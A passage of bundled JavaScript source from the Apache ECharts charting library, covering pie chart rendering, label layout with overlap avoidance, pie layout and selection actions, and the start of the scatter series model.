selected\n    toggleItemSelected(\n        this,\n        data.getItemLayout(idx),\n        seriesModel.isSelected(data.getName(idx)),\n        seriesModel.get('selectedOffset'),\n        seriesModel.get('animation')\n    );\n\n    // Label and text animation should be applied only for transition type animation when update\n    var withAnimation = !firstCreate && animationTypeUpdate === 'transition';\n    this._updateLabel(data, idx, withAnimation);\n\n    this.highDownOnUpdate = (itemModel.get('hoverAnimation') && seriesModel.isAnimationEnabled())\n        ? function (fromState, toState) {\n            if (toState === 'emphasis') {\n                labelLine.ignore = labelLine.hoverIgnore;\n                labelText.ignore = labelText.hoverIgnore;\n\n                // Sector may has animation of updating data. Force to move to the last frame\n                // Or it may stopped on the wrong shape\n                sector.stopAnimation(true);\n                sector.animateTo({\n                    shape: {\n                        r: layout.r + seriesModel.get('hoverOffset')\n                    }\n                }, 300, 'elasticOut');\n            }\n            else {\n                labelLine.ignore = labelLine.normalIgnore;\n                labelText.ignore = labelText.normalIgnore;\n\n                sector.stopAnimation(true);\n                sector.animateTo({\n                    shape: {\n                        r: layout.r\n                    }\n                }, 300, 'elasticOut');\n            }\n        }\n        : null;\n\n    setHoverStyle(this);\n};\n\npiePieceProto._updateLabel = function (data, idx, withAnimation) {\n\n    var labelLine = this.childAt(1);\n    var labelText = this.childAt(2);\n\n    var seriesModel = data.hostModel;\n    var itemModel = data.getItemModel(idx);\n    var layout = data.getItemLayout(idx);\n    var labelLayout = layout.label;\n    var visualColor = data.getItemVisual(idx, 'color');\n\n    if (!labelLayout || isNaN(labelLayout.x) || isNaN(labelLayout.y)) {\n        labelText.ignore = labelText.normalIgnore = labelText.hoverIgnore =\n        labelLine.ignore = labelLine.normalIgnore = labelLine.hoverIgnore = true;\n        return;\n    }\n\n    var targetLineShape = {\n        points: labelLayout.linePoints || [\n            [labelLayout.x, labelLayout.y], [labelLayout.x, labelLayout.y], [labelLayout.x, labelLayout.y]\n        ]\n    };\n    var targetTextStyle = {\n        x: labelLayout.x,\n        y: labelLayout.y\n    };\n    if (withAnimation) {\n        updateProps(labelLine, {\n            shape: targetLineShape\n        }, seriesModel, idx);\n\n        updateProps(labelText, {\n            style: targetTextStyle\n        }, seriesModel, idx);\n    }\n    else {\n        labelLine.attr({\n            shape: targetLineShape\n        });\n        labelText.attr({\n            style: targetTextStyle\n        });\n    }\n\n    labelText.attr({\n        rotation: labelLayout.rotation,\n        origin: [labelLayout.x, labelLayout.y],\n        z2: 10\n    });\n\n    var labelModel = itemModel.getModel('label');\n    var labelHoverModel = itemModel.getModel('emphasis.label');\n    var labelLineModel = itemModel.getModel('labelLine');\n    var labelLineHoverModel = itemModel.getModel('emphasis.labelLine');\n    var visualColor = data.getItemVisual(idx, 'color');\n\n    setLabelStyle(\n        labelText.style, labelText.hoverStyle = {}, labelModel, labelHoverModel,\n        {\n            labelFetcher: data.hostModel,\n            labelDataIndex: idx,\n            defaultText: labelLayout.text,\n            autoColor: visualColor,\n            useInsideStyle: !!labelLayout.inside\n        },\n        {\n            textAlign: labelLayout.textAlign,\n            textVerticalAlign: labelLayout.verticalAlign,\n            opacity: data.getItemVisual(idx, 'opacity')\n        }\n    );\n\n    labelText.ignore = labelText.normalIgnore = !labelModel.get('show');\n    labelText.hoverIgnore = !labelHoverModel.get('show');\n\n    labelLine.ignore = labelLine.normalIgnore = !labelLineModel.get('show');\n    labelLine.hoverIgnore = !labelLineHoverModel.get('show');\n\n    // Default use item visual color\n    labelLine.setStyle({\n        stroke: visualColor,\n        opacity: data.getItemVisual(idx, 'opacity')\n    });\n    labelLine.setStyle(labelLineModel.getModel('lineStyle').getLineStyle());\n\n    labelLine.hoverStyle = labelLineHoverModel.getModel('lineStyle').getLineStyle();\n\n    var smooth = labelLineModel.get('smooth');\n    if (smooth && smooth === true) {\n        smooth = 0.4;\n    }\n    labelLine.setShape({\n        smooth: smooth\n    });\n};\n\ninherits(PiePiece, Group);\n\n\n// Pie view\nvar PieView = Chart.extend({\n\n    type: 'pie',\n\n    init: function () {\n        var sectorGroup = new Group();\n        this._sectorGroup = sectorGroup;\n    },\n\n    render: function (seriesModel, ecModel, api, payload) {\n        if (payload && (payload.from === this.uid)) {\n            return;\n        }\n\n        var data = seriesModel.getData();\n        var oldData = this._data;\n        var group = this.group;\n\n        var hasAnimation = ecModel.get('animation');\n        var isFirstRender = !oldData;\n        var animationType = seriesModel.get('animationType');\n        var animationTypeUpdate = seriesModel.get('animationTypeUpdate');\n\n        var onSectorClick = curry(\n            updateDataSelected, this.uid, seriesModel, hasAnimation, api\n        );\n\n        var selectedMode = seriesModel.get('selectedMode');\n        data.diff(oldData)\n            .add(function (idx) {\n                var piePiece = new PiePiece(data, idx);\n                // Default expansion animation\n                if (isFirstRender && animationType !== 'scale') {\n                    piePiece.eachChild(function (child) {\n                        child.stopAnimation(true);\n                    });\n                }\n\n                selectedMode && piePiece.on('click', onSectorClick);\n\n                data.setItemGraphicEl(idx, piePiece);\n\n                group.add(piePiece);\n            })\n            .update(function (newIdx, oldIdx) {\n                var piePiece = oldData.getItemGraphicEl(oldIdx);\n\n                if (!isFirstRender && animationTypeUpdate !== 'transition') {\n                    piePiece.eachChild(function (child) {\n                        child.stopAnimation(true);\n                    });\n                }\n\n                piePiece.updateData(data, newIdx);\n\n                piePiece.off('click');\n                selectedMode && piePiece.on('click', onSectorClick);\n                group.add(piePiece);\n                data.setItemGraphicEl(newIdx, piePiece);\n            })\n            .remove(function (idx) {\n                var piePiece = oldData.getItemGraphicEl(idx);\n                group.remove(piePiece);\n            })\n            .execute();\n\n        if (\n            hasAnimation && data.count() > 0\n            && (isFirstRender ? animationType !== 'scale' : animationTypeUpdate !== 'transition')\n        ) {\n            var shape = data.getItemLayout(0);\n            for (var s = 1; isNaN(shape.startAngle) && s < data.count(); ++s) {\n                shape = data.getItemLayout(s);\n            }\n\n            var r = Math.max(api.getWidth(), api.getHeight()) / 2;\n\n            var removeClipPath = bind(group.removeClipPath, group);\n            group.setClipPath(this._createClipPath(\n                shape.cx, shape.cy, r, shape.startAngle, shape.clockwise, removeClipPath, seriesModel, isFirstRender\n            ));\n        }\n        else {\n            // clipPath is used in first-time animation, so remove it when otherwise. See: #8994\n            group.removeClipPath();\n        }\n\n        this._data = data;\n    },\n\n    dispose: function () {},\n\n    _createClipPath: function (\n        cx, cy, r, startAngle, clockwise, cb, seriesModel, isFirstRender\n    ) {\n        var clipPath = new Sector({\n            shape: {\n                cx: cx,\n                cy: cy,\n                r0: 0,\n                r: r,\n                startAngle: startAngle,\n                endAngle: startAngle,\n                clockwise: clockwise\n            }\n        });\n\n        var initOrUpdate = isFirstRender ? initProps : updateProps;\n        initOrUpdate(clipPath, {\n            shape: {\n                endAngle: startAngle + (clockwise ? 1 : -1) * Math.PI * 2\n            }\n        }, seriesModel, cb);\n\n        return clipPath;\n    },\n\n    /**\n     * @implement\n     */\n    containPoint: function (point, seriesModel) {\n        var data = seriesModel.getData();\n        var itemLayout = data.getItemLayout(0);\n        if (itemLayout) {\n            var dx = point[0] - itemLayout.cx;\n            var dy = point[1] - itemLayout.cy;\n            var radius = Math.sqrt(dx * dx + dy * dy);\n            return radius <= itemLayout.r && radius >= itemLayout.r0;\n        }\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar createDataSelectAction = function (seriesType, actionInfos) {\n    each$1(actionInfos, function (actionInfo) {\n        actionInfo.update = 'updateView';\n        /**\n         * @payload\n         * @property {string} seriesName\n         * @property {string} name\n         */\n        registerAction(actionInfo, function (payload, ecModel) {\n            var selected = {};\n            ecModel.eachComponent(\n                {mainType: 'series', subType: seriesType, query: payload},\n                function (seriesModel) {\n                    if (seriesModel[actionInfo.method]) {\n                        seriesModel[actionInfo.method](\n                            payload.name,\n                            payload.dataIndex\n                        );\n                    }\n                    var data = seriesModel.getData();\n                    // Create selected map\n                    data.each(function (idx) {\n                        var name = data.getName(idx);\n                        selected[name] = seriesModel.isSelected(name)\n                            || false;\n                    });\n                }\n            );\n            return {\n                name: payload.name,\n                selected: selected,\n                seriesId: payload.seriesId\n            };\n        });\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Pick color from palette for each data item.\n// Applicable for charts that require applying color palette\n// in data level (like pie, funnel, chord).\nvar dataColor = function (seriesType) {\n    return {\n        getTargetSeries: function (ecModel) {\n            // Pie and funnel may use diferrent scope\n            var paletteScope = {};\n            var seiresModelMap = createHashMap();\n\n            ecModel.eachSeriesByType(seriesType, function (seriesModel) {\n                seriesModel.__paletteScope = paletteScope;\n                seiresModelMap.set(seriesModel.uid, seriesModel);\n            });\n\n            return seiresModelMap;\n        },\n        reset: function (seriesModel, ecModel) {\n            var dataAll = seriesModel.getRawData();\n            var idxMap = {};\n            var data = seriesModel.getData();\n\n            data.each(function (idx) {\n                var rawIdx = data.getRawIndex(idx);\n                idxMap[rawIdx] = idx;\n            });\n\n            dataAll.each(function (rawIdx) {\n                var filteredIdx = idxMap[rawIdx];\n\n                // If series.itemStyle.normal.color is a function. itemVisual may be encoded\n                var singleDataColor = filteredIdx != null\n                    && data.getItemVisual(filteredIdx, 'color', true);\n\n                var singleDataBorderColor = filteredIdx != null\n                    && data.getItemVisual(filteredIdx, 'borderColor', true);\n\n                var itemModel;\n                if (!singleDataColor || !singleDataBorderColor) {\n                    // FIXME Performance\n                    itemModel = dataAll.getItemModel(rawIdx);\n                }\n\n                if (!singleDataColor) {\n                    var color = itemModel.get('itemStyle.color')\n                        || seriesModel.getColorFromPalette(\n                            dataAll.getName(rawIdx) || (rawIdx + ''), seriesModel.__paletteScope,\n                            dataAll.count()\n                        );\n                    // Data is not filtered\n                    if (filteredIdx != null) {\n                        data.setItemVisual(filteredIdx, 'color', color);\n                    }\n                }\n\n                if (!singleDataBorderColor) {\n                    var borderColor = itemModel.get('itemStyle.borderColor');\n\n                    // Data is not filtered\n                    if (filteredIdx != null) {\n                        data.setItemVisual(filteredIdx, 'borderColor', borderColor);\n                    }\n                }\n            });\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// FIXME emphasis label position is not same with normal label position\n\nvar RADIAN$1 = Math.PI / 180;\n\nfunction adjustSingleSide(list, cx, cy, r, dir, viewWidth, viewHeight, viewLeft, viewTop, farthestX) {\n    list.sort(function (a, b) {\n        return a.y - b.y;\n    });\n\n    function shiftDown(start, end, delta, dir) {\n        for (var j = start; j < end; j++) {\n            if (list[j].y + delta > viewTop + viewHeight) {\n                break;\n            }\n\n            list[j].y += delta;\n            if (j > start\n                && j + 1 < end\n                && list[j + 1].y > list[j].y + list[j].height\n            ) {\n                shiftUp(j, delta / 2);\n                return;\n            }\n        }\n\n        shiftUp(end - 1, delta / 2);\n    }\n\n    function shiftUp(end, delta) {\n        for (var j = end; j >= 0; j--) {\n            if (list[j].y - delta < viewTop) {\n                break;\n            }\n\n            list[j].y -= delta;\n            if (j > 0\n                && list[j].y > list[j - 1].y + list[j - 1].height\n            ) {\n                break;\n            }\n        }\n    }\n\n    function changeX(list, isDownList, cx, cy, r, dir) {\n        var lastDeltaX = dir > 0\n            ? isDownList                // right-side\n                ? Number.MAX_VALUE      // down\n                : 0                     // up\n            : isDownList                // left-side\n                ? Number.MAX_VALUE      // down\n                : 0;                    // up\n\n        for (var i = 0, l = list.length; i < l; i++) {\n            if (list[i].labelAlignTo !== 'none') {\n                continue;\n            }\n\n            var deltaY = Math.abs(list[i].y - cy);\n            var length = list[i].len;\n            var length2 = list[i].len2;\n            var deltaX = (deltaY < r + length)\n                ? Math.sqrt(\n                        (r + length + length2) * (r + length + length2)\n                        - deltaY * deltaY\n                    )\n                : Math.abs(list[i].x - cx);\n            if (isDownList && deltaX >= lastDeltaX) {\n                // right-down, left-down\n                deltaX = lastDeltaX - 10;\n            }\n            if (!isDownList && deltaX <= lastDeltaX) {\n                // right-up, left-up\n                deltaX = lastDeltaX + 10;\n            }\n\n            list[i].x = cx + deltaX * dir;\n            lastDeltaX = deltaX;\n        }\n    }\n\n    var lastY = 0;\n    var delta;\n    var len = list.length;\n    var upList = [];\n    var downList = [];\n    for (var i = 0; i < len; i++) {\n        if (list[i].position === 'outer' && list[i].labelAlignTo === 'labelLine') {\n            var dx = list[i].x - farthestX;\n            list[i].linePoints[1][0] += dx;\n            list[i].x = farthestX;\n        }\n\n        delta = list[i].y - lastY;\n        if (delta < 0) {\n            shiftDown(i, len, -delta, dir);\n        }\n        lastY = list[i].y + list[i].height;\n    }\n    if (viewHeight - lastY < 0) {\n        shiftUp(len - 1, lastY - viewHeight);\n    }\n    for (var i = 0; i < len; i++) {\n        if (list[i].y >= cy) {\n            downList.push(list[i]);\n        }\n        else {\n            upList.push(list[i]);\n        }\n    }\n    changeX(upList, false, cx, cy, r, dir);\n    changeX(downList, true, cx, cy, r, dir);\n}\n\nfunction avoidOverlap(labelLayoutList, cx, cy, r, viewWidth, viewHeight, viewLeft, viewTop) {\n    var leftList = [];\n    var rightList = [];\n    var leftmostX = Number.MAX_VALUE;\n    var rightmostX = -Number.MAX_VALUE;\n    for (var i = 0; i < labelLayoutList.length; i++) {\n        if (isPositionCenter(labelLayoutList[i])) {\n            continue;\n        }\n        if (labelLayoutList[i].x < cx) {\n            leftmostX = Math.min(leftmostX, labelLayoutList[i].x);\n            leftList.push(labelLayoutList[i]);\n        }\n        else {\n            rightmostX = Math.max(rightmostX, labelLayoutList[i].x);\n            rightList.push(labelLayoutList[i]);\n        }\n    }\n\n    adjustSingleSide(rightList, cx, cy, r, 1, viewWidth, viewHeight, viewLeft, viewTop, rightmostX);\n    adjustSingleSide(leftList, cx, cy, r, -1, viewWidth, viewHeight, viewLeft, viewTop, leftmostX);\n\n    for (var i = 0; i < labelLayoutList.length; i++) {\n        var layout = labelLayoutList[i];\n        if (isPositionCenter(layout)) {\n            continue;\n        }\n\n        var linePoints = layout.linePoints;\n        if (linePoints) {\n            var isAlignToEdge = layout.labelAlignTo === 'edge';\n\n            var realTextWidth = layout.textRect.width;\n            var targetTextWidth;\n            if (isAlignToEdge) {\n                if (layout.x < cx) {\n                    targetTextWidth = linePoints[2][0] - layout.labelDistance\n                            - viewLeft - layout.labelMargin;\n                }\n                else {\n                    targetTextWidth = viewLeft + viewWidth - layout.labelMargin\n                            - linePoints[2][0] - layout.labelDistance;\n                }\n            }\n            else {\n                if (layout.x < cx) {\n                    targetTextWidth = layout.x - viewLeft - layout.bleedMargin;\n                }\n                else {\n                    targetTextWidth = viewLeft + viewWidth - layout.x - layout.bleedMargin;\n                }\n            }\n            if (targetTextWidth < layout.textRect.width) {\n                layout.text = truncateText(layout.text, targetTextWidth, layout.font);\n                if (layout.labelAlignTo === 'edge') {\n                    realTextWidth = getWidth(layout.text, layout.font);\n                }\n            }\n\n            var dist = linePoints[1][0] - linePoints[2][0];\n            if (isAlignToEdge) {\n                if (layout.x < cx) {\n                    linePoints[2][0] = viewLeft + layout.labelMargin + realTextWidth + layout.labelDistance;\n                }\n                else {\n                    linePoints[2][0] = viewLeft + viewWidth - layout.labelMargin\n                            - realTextWidth - layout.labelDistance;\n                }\n            }\n            else {\n                if (layout.x < cx) {\n                    linePoints[2][0] = layout.x + layout.labelDistance;\n                }\n                else {\n                    linePoints[2][0] = layout.x - layout.labelDistance;\n                }\n                linePoints[1][0] = linePoints[2][0] + dist;\n            }\n            linePoints[1][1] = linePoints[2][1] = layout.y;\n        }\n    }\n}\n\nfunction isPositionCenter(layout) {\n    // Not change x for center label\n    return layout.position === 'center';\n}\n\nvar labelLayout = function (seriesModel, r, viewWidth, viewHeight, viewLeft, viewTop) {\n    var data = seriesModel.getData();\n    var labelLayoutList = [];\n    var cx;\n    var cy;\n    var hasLabelRotate = false;\n    var minShowLabelRadian = (seriesModel.get('minShowLabelAngle') || 0) * RADIAN$1;\n\n    data.each(function (idx) {\n        var layout = data.getItemLayout(idx);\n\n        var itemModel = data.getItemModel(idx);\n        var labelModel = itemModel.getModel('label');\n        // Use position in normal or emphasis\n        var labelPosition = labelModel.get('position') || itemModel.get('emphasis.label.position');\n        var labelDistance = labelModel.get('distanceToLabelLine');\n        var labelAlignTo = labelModel.get('alignTo');\n        var labelMargin = parsePercent$1(labelModel.get('margin'), viewWidth);\n        var bleedMargin = labelModel.get('bleedMargin');\n        var font = labelModel.getFont();\n\n        var labelLineModel = itemModel.getModel('labelLine');\n        var labelLineLen = labelLineModel.get('length');\n        labelLineLen = parsePercent$1(labelLineLen, viewWidth);\n        var labelLineLen2 = labelLineModel.get('length2');\n        labelLineLen2 = parsePercent$1(labelLineLen2, viewWidth);\n\n        if (layout.angle < minShowLabelRadian) {\n            return;\n        }\n\n        var midAngle = (layout.startAngle + layout.endAngle) / 2;\n        var dx = Math.cos(midAngle);\n        var dy = Math.sin(midAngle);\n\n        var textX;\n        var textY;\n        var linePoints;\n        var textAlign;\n\n        cx = layout.cx;\n        cy = layout.cy;\n\n        var text = seriesModel.getFormattedLabel(idx, 'normal')\n                || data.getName(idx);\n        var textRect = getBoundingRect(\n            text, font, textAlign, 'top'\n        );\n\n        var isLabelInside = labelPosition === 'inside' || labelPosition === 'inner';\n        if (labelPosition === 'center') {\n            textX = layout.cx;\n            textY = layout.cy;\n            textAlign = 'center';\n        }\n        else {\n            var x1 = (isLabelInside ? (layout.r + layout.r0) / 2 * dx : layout.r * dx) + cx;\n            var y1 = (isLabelInside ? (layout.r + layout.r0) / 2 * dy : layout.r * dy) + cy;\n\n            textX = x1 + dx * 3;\n            textY = y1 + dy * 3;\n\n            if (!isLabelInside) {\n                // For roseType\n                var x2 = x1 + dx * (labelLineLen + r - layout.r);\n                var y2 = y1 + dy * (labelLineLen + r - layout.r);\n                var x3 = x2 + ((dx < 0 ? -1 : 1) * labelLineLen2);\n                var y3 = y2;\n\n                if (labelAlignTo === 'edge') {\n                    // Adjust textX because text align of edge is opposite\n                    textX = dx < 0\n                        ? viewLeft + labelMargin\n                        : viewLeft + viewWidth - labelMargin;\n                }\n                else {\n                    textX = x3 + (dx < 0 ? -labelDistance : labelDistance);\n                }\n                textY = y3;\n                linePoints = [[x1, y1], [x2, y2], [x3, y3]];\n            }\n\n            textAlign = isLabelInside\n                ? 'center'\n                : (labelAlignTo === 'edge'\n                    ? (dx > 0 ? 'right' : 'left')\n                    : (dx > 0 ? 'left' : 'right'));\n        }\n\n        var labelRotate;\n        var rotate = labelModel.get('rotate');\n        if (typeof rotate === 'number') {\n            labelRotate = rotate * (Math.PI / 180);\n        }\n        else {\n            labelRotate = rotate\n                ? (dx < 0 ? -midAngle + Math.PI : -midAngle)\n                : 0;\n        }\n\n        hasLabelRotate = !!labelRotate;\n        layout.label = {\n            x: textX,\n            y: textY,\n            position: labelPosition,\n            height: textRect.height,\n            len: labelLineLen,\n            len2: labelLineLen2,\n            linePoints: linePoints,\n            textAlign: textAlign,\n            verticalAlign: 'middle',\n            rotation: labelRotate,\n            inside: isLabelInside,\n            labelDistance: labelDistance,\n            labelAlignTo: labelAlignTo,\n            labelMargin: labelMargin,\n            bleedMargin: bleedMargin,\n            textRect: textRect,\n            text: text,\n            font: font\n        };\n\n        // Not layout the inside label\n        if (!isLabelInside) {\n            labelLayoutList.push(layout.label);\n        }\n    });\n    if (!hasLabelRotate && seriesModel.get('avoidLabelOverlap')) {\n        avoidOverlap(labelLayoutList, cx, cy, r, viewWidth, viewHeight, viewLeft, viewTop);\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar PI2$4 = Math.PI * 2;\nvar RADIAN = Math.PI / 180;\n\nfunction getViewRect(seriesModel, api) {\n    return getLayoutRect(\n        seriesModel.getBoxLayoutParams(), {\n            width: api.getWidth(),\n            height: api.getHeight()\n        }\n    );\n}\n\nvar pieLayout = function (seriesType, ecModel, api, payload) {\n    ecModel.eachSeriesByType(seriesType, function (seriesModel) {\n        var data = seriesModel.getData();\n        var valueDim = data.mapDimension('value');\n        var viewRect = getViewRect(seriesModel, api);\n\n        var center = seriesModel.get('center');\n        var radius = seriesModel.get('radius');\n\n        if (!isArray(radius)) {\n            radius = [0, radius];\n        }\n        if (!isArray(center)) {\n            center = [center, center];\n        }\n\n        var width = parsePercent$1(viewRect.width, api.getWidth());\n        var height = parsePercent$1(viewRect.height, api.getHeight());\n        var size = Math.min(width, height);\n        var cx = parsePercent$1(center[0], width) + viewRect.x;\n        var cy = parsePercent$1(center[1], height) + viewRect.y;\n        var r0 = parsePercent$1(radius[0], size / 2);\n        var r = parsePercent$1(radius[1], size / 2);\n\n        var startAngle = -seriesModel.get('startAngle') * RADIAN;\n\n        var minAngle = seriesModel.get('minAngle') * RADIAN;\n\n        var validDataCount = 0;\n        data.each(valueDim, function (value) {\n            !isNaN(value) && validDataCount++;\n        });\n\n        var sum = data.getSum(valueDim);\n        // Sum may be 0\n        var unitRadian = Math.PI / (sum || validDataCount) * 2;\n\n        var clockwise = seriesModel.get('clockwise');\n\n        var roseType = seriesModel.get('roseType');\n        var stillShowZeroSum = seriesModel.get('stillShowZeroSum');\n\n        // [0...max]\n        var extent = data.getDataExtent(valueDim);\n        extent[0] = 0;\n\n        // In the case some sector angle is smaller than minAngle\n        var restAngle = PI2$4;\n        var valueSumLargerThanMinAngle = 0;\n\n        var currentAngle = startAngle;\n        var dir = clockwise ? 1 : -1;\n\n        data.each(valueDim, function (value, idx) {\n            var angle;\n            if (isNaN(value)) {\n                data.setItemLayout(idx, {\n                    angle: NaN,\n                    startAngle: NaN,\n                    endAngle: NaN,\n                    clockwise: clockwise,\n                    cx: cx,\n                    cy: cy,\n                    r0: r0,\n                    r: roseType\n                        ? NaN\n                        : r,\n                    viewRect: viewRect\n                });\n                return;\n            }\n\n            // FIXME 兼容 2.0 但是 roseType 是 area 的时候才是这样？\n            if (roseType !== 'area') {\n                angle = (sum === 0 && stillShowZeroSum)\n                    ? unitRadian : (value * unitRadian);\n            }\n            else {\n                angle = PI2$4 / validDataCount;\n            }\n\n            if (angle < minAngle) {\n                angle = minAngle;\n                restAngle -= minAngle;\n            }\n            else {\n                valueSumLargerThanMinAngle += value;\n            }\n\n            var endAngle = currentAngle + dir * angle;\n            data.setItemLayout(idx, {\n                angle: angle,\n                startAngle: currentAngle,\n                endAngle: endAngle,\n                clockwise: clockwise,\n                cx: cx,\n                cy: cy,\n                r0: r0,\n                r: roseType\n                    ? linearMap(value, extent, [r0, r])\n                    : r,\n                viewRect: viewRect\n            });\n\n            currentAngle = endAngle;\n        });\n\n        // Some sector is constrained by minAngle\n        // Rest sectors needs recalculate angle\n        if (restAngle < PI2$4 && validDataCount) {\n            // Average the angle if rest angle is not enough after all angles is\n            // Constrained by minAngle\n            if (restAngle <= 1e-3) {\n                var angle = PI2$4 / validDataCount;\n                data.each(valueDim, function (value, idx) {\n                    if (!isNaN(value)) {\n                        var layout = data.getItemLayout(idx);\n                        layout.angle = angle;\n                        layout.startAngle = startAngle + dir * idx * angle;\n                        layout.endAngle = startAngle + dir * (idx + 1) * angle;\n                    }\n                });\n            }\n            else {\n                unitRadian = restAngle / valueSumLargerThanMinAngle;\n                currentAngle = startAngle;\n                data.each(valueDim, function (value, idx) {\n                    if (!isNaN(value)) {\n                        var layout = data.getItemLayout(idx);\n                        var angle = layout.angle === minAngle\n                            ? minAngle : value * unitRadian;\n                        layout.startAngle = currentAngle;\n                        layout.endAngle = currentAngle + dir * angle;\n                        currentAngle += dir * angle;\n                    }\n                });\n            }\n        }\n\n        labelLayout(seriesModel, r, viewRect.width, viewRect.height, viewRect.x, viewRect.y);\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar dataFilter = function (seriesType) {\n    return {\n        seriesType: seriesType,\n        reset: function (seriesModel, ecModel) {\n            var legendModels = ecModel.findComponents({\n                mainType: 'legend'\n            });\n            if (!legendModels || !legendModels.length) {\n                return;\n            }\n            var data = seriesModel.getData();\n            data.filterSelf(function (idx) {\n                var name = data.getName(idx);\n                // If in any legend component the status is not selected.\n                for (var i = 0; i < legendModels.length; i++) {\n                    if (!legendModels[i].isSelected(name)) {\n                        return false;\n                    }\n                }\n                return true;\n            });\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\ncreateDataSelectAction('pie', [{\n    type: 'pieToggleSelect',\n    event: 'pieselectchanged',\n    method: 'toggleSelected'\n}, {\n    type: 'pieSelect',\n    event: 'pieselected',\n    method: 'select'\n}, {\n    type: 'pieUnSelect',\n    event: 'pieunselected',\n    method: 'unSelect'\n}]);\n\nregisterVisual(dataColor('pie'));\nregisterLayout(curry(pieLayout, 'pie'));\nregisterProcessor(dataFilter('pie'));\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nSeriesModel.extend({\n\n    type: 'series.scatter',\n\n    dependencies: ['grid', 'polar', 'geo', 'singleAxis', 'calendar'],\n\n    getInitialData: function (option, ecModel) {\n        return createListFromArray(this.getSource(), this, {useEncodeDefaulter: true});\n    },\n\n    brushSelector: 'point',\n\n    getProgressive: function () {\n        var progressive = this.option.progressive;\n        if (progressive == null) {\n            // PENDING\n            return this.option.large ? 5e3 : this.get('progressive');\n        }\n        return progressive;\n    },\n\n    getProgressiveThreshold: function () {\n        var progressiveThreshold = this.option.progressiveThreshold;\n        if (progressiveThreshold == null) {\n            // PENDING\n            return this.option.large ? 1e4 : this.get('progressiveThreshold');\n        }\n        return progressiveThreshold;\n    },\n\n    defaultOption: {\n        coordinateSystem: 'cartesian2d',\n        zlevel: 0,\n        z: 2,\n        legendHoverLink: true,\n\n        hoverAnimation: true,\n        // Cartesian coordinate system\n        // xAxisIndex: 0,\n        // yAxisIndex: 0,\n\n        // Polar coordinate system\n        // polarIndex: 0,\n\n        // Geo coordinate system\n        // geoIndex: 0,\n\n        // symbol: null,        // 图形类型\n        symbolSize: 10,          // 图形大小，半宽（半径）参数，当图形为方向或菱形则总宽度为symbolSize * 2\n        // symbolRotate: null,  // 